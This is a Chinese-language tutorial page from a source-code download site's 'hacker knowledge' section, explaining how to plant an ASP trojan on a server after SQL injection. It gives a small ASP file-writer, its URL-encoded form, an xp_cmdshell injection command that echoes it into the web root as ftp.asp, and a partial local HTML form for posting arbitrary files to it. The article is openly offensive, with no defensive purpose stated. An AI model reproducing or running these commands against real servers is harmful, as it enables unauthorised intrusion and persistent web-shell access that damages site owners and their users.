首 页 ┆ 源码下载 ┆ IT学院 ┆ 字体下载 ┆ 模板下载 ┆ 源码发布 ┆ 广告合作 ┆ 网站地图 ┆ 虚拟主机 ┆ 中文域名
► 设为首页
► 加入收藏
► 联系我们
源码下载 >> ASP源码 | PHP源码 | ASP.net源码 | JSP源码 | CGI源码 | VC/C++源码 | VB源码 | Delphi源码 | Flash源码
文章学院 >> 网络编程 | 网页设计 | 图形图象 | 数据库 | 服务器 | 网络媒体 | 网络安全 | 操作系统 | 办公软件 | 软件开发 | 黑客知识
字体下载 >> 精制字体 | 非英字体 | 艺术字体 | 著名字体 | 哥特式 | 简单字体 | 手写体 | 节假日 | 图案字体 | 精度像素 | 中文字体
模板下载 >> 企业门户 | 数码网络 | 休闲娱乐 | 影视音乐 | 旅游名胜 | 文化艺术 | 电子商务 | 个性展示 | 登陆导航 | Flash模板
►►您当前的位置:源码园 → IT学院 → 黑客知识 → 黑客入门 → 文章内容

SQL注入与ASP木马上传--SQL,注入,ASP,木马,上传

作者:佚名  来源:网上收集  发布时间:2007-1-9 15:24:52

SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。
1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。
文件内容:
<%
Set objFSO = Server.CreateObject
("scripting.FileSystemObject")

Set objCountFile=objFSO.CreateTextFile
(request("mypath"),True)

objCountFile.Write request("mydata")
objCountFile.Close
%>
这个文件可以写成一行
<%Set objFSO = Server.CreateObject
("scripting.FileSystemObject"):
Set objCountFile=objFSO.CreateTextFile
(request("mypath"),True):objCountFile.Write request("mydata"):
objCountFile.Close%>

将特殊字符进行编码 就可以得到
%3C%25Set%20objFSO%20=%20Server.CreateObject
(%22scripting.FileSystemObject%22):
Set%20objCountFile=objFSO.CreateTextFile(request(%22mypath%22),True):
objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E

注入(这里假定web目录是C:\Inetpub\wwwroot\): 
exec master..xp_cmdshell 'echo 
"%3C%25Set%20objFSO%20=%20Server.CreateObject
(%22scripting.FileSystemObject%22):
Set%20objCountFile=objFSO.CreateTextFile
(request(%22mypath%22),True):
objCountFile.Write%20request(%22mydata%22):
objCountFile.Close%25%3E" > C:\Inetpub\wwwroot\ftp.asp';

这样 在服务器的web 目录下 将生成一个 ftp.asp文件
该文件的代码为
<%
Set objFSO = Server.CreateObject
("scripting.FileSystemObject")
Set objCountFile=objFSO.CreateTextFile
(request("mypath"),True)
objCountFile.Write request
("mydata")
objCountFile.Close
%>
你可以看到,上面代码中预留了两个接口 mypath 和 mydata

mypath是下次提交的时候 文件的生成路径
mydata是文件的内容

在本地编写一个客户端文件 例:RohuClient.htm 代码如下












action=""  target="_blank">

cellpadding="0" cellspacing="0">

目标位置:
type="text" id="ftpUrl" size="50">
例:http://127.0.0.1/FTP.ASP<;/td>


生成文件:

将在服务器上,生成的文件路径。例:
C:\Inetpub\wwwroot\Server.asp 


文件代码:
rows="10" id="textarea">


 








版权所有:
XXXX(上一页  [1] [2] 

[] [返回上一页] [打 印]
  • 上一篇文章:病毒加壳技术与脱壳杀毒方法--病毒,加壳,技术,脱壳,杀毒,方法
  • 下一篇文章:巧妙破解开别人ASP木马密码的方法--破解,ASP,木马,密码,方法

  • 相关文章:
  • 利用LINQ轻松清除SQL注入式攻击威胁
  • [组图]Web环境下SQL注入攻击的检测与防御
  • 利用instr()函数防止SQL注入攻击
  • hdsi2.0 sql注入部分抓包(4)
  • hdsi2.0 sql注入部分抓包(3)
  • hdsi2.0 sql注入部分抓包(2)
  • hdsi2.0 sql注入部分抓包(1)
  • 蓝雨设计整站SQL注入漏洞
  • SQL注入80004005 及其它错误消息
  • [组图]三步堵死SQL注入漏洞
  • [图文]跨站式SQL注入技巧
  • SQL注入不完全思路与防注入程序--SQL,注入,思路,防注...
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 源码发布
Copyright © 2003-2009 Ymyasp.Com. All Rights Reserved .
备案序号:粤ICP备07029071号